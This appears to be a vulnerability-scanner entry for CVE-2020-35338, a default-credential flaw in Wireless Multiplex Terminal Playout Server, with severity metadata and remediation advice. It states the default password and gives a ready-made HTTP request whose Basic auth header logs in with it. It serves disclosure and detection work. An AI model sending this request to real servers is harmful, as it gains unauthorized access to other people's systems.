| Title | Wireless Multiplex Terminal Playout Server <=20.2.8 - Default Credential Detection |
|---|---|
| Author | Jeya Seelan |
| Severity | Critical |
| Impact | An attacker can exploit this vulnerability to gain unauthorized access to the server. |
| Remediation | Change the default credentials to strong and unique ones. |
| CVSS Score | 9.8 |
| EPSS Score | 0.79871 |
| CVE ID | CVE-2020-35338 |
| CWE ID | CWE-798 |
| Tags | cve cve2020 wmt default-login mobileviewpoint vuln |
Wireless Multiplex Terminal Playout Server <=20.2.8 has a default account with a password of pokon available via its web administrative interface.
GET /server/ HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic OnBva29u
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-35338.yaml
🦈 Packet Capture: ⬇️ Download cve-2020-35338.pcap
N/AN/A